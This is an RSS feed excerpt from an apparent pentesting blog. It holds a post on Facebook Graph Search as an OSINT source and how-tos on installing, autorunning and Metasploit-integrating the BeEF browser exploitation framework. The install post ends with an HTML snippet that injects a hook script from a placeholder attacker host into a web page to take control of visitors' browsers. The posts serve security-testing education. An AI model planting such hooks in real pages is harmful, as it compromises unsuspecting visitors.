<p><img class="aligncenter size-full wp-image-1495" alt="Zuckerberg" src="http://www.subliminalhacking.net/wp-content/uploads/2013/01/Zuckerberg.png" width="291" height="170" /></p>
<p>The aim of Facebook Graph as far as I can tell is to allow more powerful searching of all the juicy information that Facebook holds on their products, sorry I mean users. The theory being if you want to know a good restaurant in a certain area you can do a simple search query &#8220;Places people like to eat in London&#8221; and it will respond with a load of recommendations based on the information / recommendations / likes of your friends, and their friends&#8217; friends. The same can be done to check which of your friends or associates live in a certain area, have certain hobbies, work certain places and suchlike. According to the video from the Facebook founder, these are just early days and they plan to offer more search options over time. From looking at Facebook Graph I see the following options to search against:</p>
<p>My Friends, Photos of My Friends, Restaurants Nearby, Games My Friends Play, Music My Friends Like, Photos I have Liked, Groups My Friends Are In, Apps My Friends Use, Movies My Friends Like, Current Cities Of My Friends and so on.</p>
<p>I think this gives a little insight into some of the information available. The aim is to provide more personal, intelligent information for users of Facebook, and the results in theory should be more relevant than those of a search engine. Interestingly though, there is an option at the bottom to use the search query on the Internet, and this uses Microsoft&#8217;s Bing Search Engine.</p>
<p>So I think this service will help further identify that circle of trust between people, common interests, favorite locations and the like. Some of this information is accessible today, but it can be like a needle in a haystack, perhaps this makes that needle a little bigger <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  No doubt there will be privacy configurations, but at the same time I can&#8217;t help but think that those settings wouldn&#8217;t be able to restrict too much information, as without the information there is no product. Time will tell I guess, but certainly something worth following as it develops in my opinion.</p>
<p>If you have not heard of Facebook Graph check out the <a href="https://www.facebook.com/about/graphsearch" target="_blank">Facebook release info</a>.<br />
And if you are a developer, you might want to check out the <a href="https://developers.facebook.com/docs/reference/api/" target="_blank">Graph API</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How To Integrate Metasploit with BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Mon, 07 Jan 2013 23:48:32 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Adobe CoolType]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[CVE-2010-2883]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1414</guid>
		<description><![CDATA[So the Browser Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun. It&#8217;s like a Social Engineer&#8217;s / Pentester&#8217;s wet dream&#8230; It&#8217;s a Geek thing This video shows you how you can [...]]]></description>
				<content:encoded><![CDATA[<p>So the Browser Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun. It&#8217;s like a Social Engineer&#8217;s / Pentester&#8217;s wet dream&#8230; It&#8217;s a Geek thing <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>This video shows you how you can integrate Metasploit into BeEF, and gives a quick example of exploiting a Windows XP SP3 box with Adobe 9 installed that is vulnerable to the Adobe CoolType Buffer Overflow Vulnerability (CVE-2010-2883).</p>
<p><em>Note: You will need Metasploit installed with some form of database support, such as postgres. This video does not show you how to install and configure Metasploit and postgres.</em></p>
<p><iframe src="http://www.youtube.com/embed/BQf5Gv9dprw" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/07/how-to-integrate-metasploit-with-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Autorun Modules in BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Thu, 03 Jan 2013 19:56:37 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[autorun]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1375</guid>
		<description><![CDATA[Unless you are the Social Engineer with the fastest fingers in the west, you are going to have a challenge on your hands trying to initiate the various BeEF modules of interest when you initially hook a compromised host. So to have this happen automagically we can make changes to the individual module&#8217;s config file. [...]]]></description>
				<content:encoded><![CDATA[<p>Unless you are the Social Engineer with the fastest fingers in the west, you are going to have a challenge on your hands trying to initiate the various BeEF modules of interest when you initially hook a compromised host. So to have this happen automagically we can make changes to the individual module&#8217;s config file. This video shows you just how easy it is to achieve.</p>
<p><iframe src="http://www.youtube.com/embed/qATHn_iKCas" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p><em>Note: At the time of publishing this post not all modules are successfully autorunning. A ticket has been opened to request a fix and you can monitor the progress <a href="https://github.com/beefproject/beef/issues/769" target="_blank">here</a>.</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/03/how-to-autorun-modules-in-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Install BeEF &#8230; Browser Exploitation Framework</title>
		<link>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/</link>
		<comments>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/#comments</comments>
		<pubDate>Thu, 03 Jan 2013 13:02:17 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[BeEF]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Browser Exploitation Framework]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1361</guid>
		<description><![CDATA[The Browser Exploitation Framework (BeEF) is an excellent tool for Social Engineers and Pentesters. This video provides a quick How To on installing it under Linux. The install from start to finish takes around 10 minutes, but the video has been condensed as to not waste your time. A list of some of the commands [...]]]></description>
				<content:encoded><![CDATA[<p>The Browser Exploitation Framework (BeEF) is an excellent tool for Social Engineers and Pentesters. This video provides a quick How To on installing it under Linux. The install from start to finish takes around 10 minutes, but the video has been condensed so as not to waste your time. A list of some of the commands I used, for copy and pasting purposes, is provided below.</p>
<p><iframe src="http://www.youtube.com/embed/mTGzvnJs3P8" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<h3>Commands used:</h3>
<p>lsb_release -a</p>
<p>sudo apt-get update</p>
<p>sudo apt-get install curl git ruby build-essential libsqlite3-ruby libsqlite3-dev libssl-dev</p>
<p>bash &lt; &lt;(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer )</p>
<p>sudo echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] &amp;&amp; . "$HOME/.rvm/scripts/rvm" # Load RVM function' &gt;&gt; ~/.bash_profile</p>
<p>rvm install ruby-1.9.2-p290</p>
<p>gem install bundler</p>
<p>git clone https://github.com/beefproject/beef.git</p>
<p>bundle install</p>
<p>nano config.yaml <em>(in the root of the beef directory)</em></p>
<div class="divider">&nbsp;</div>
<p><em><strong>Helpful Hint</strong> &#8211; To enable the BeEF hook in your web page during an engagement add the hook script in before or after the body in your html file. Here is an example:</em></p>
<p><em>&lt;html&gt;</em><br />
<em>&lt;body&gt;</em><br />
<em>HOOK ME BABY ONE MORE TIME!!</em><br />
<em>&lt;/body&gt;</em><br />
<em>&lt;script src="http://YOUR-IP-HERE:3000/hook.js"&gt;&lt;/script&gt;</em><br />
<em>&lt;/html&gt;</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/01/03/how-to-install-beef-browser-exploitation-framework/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
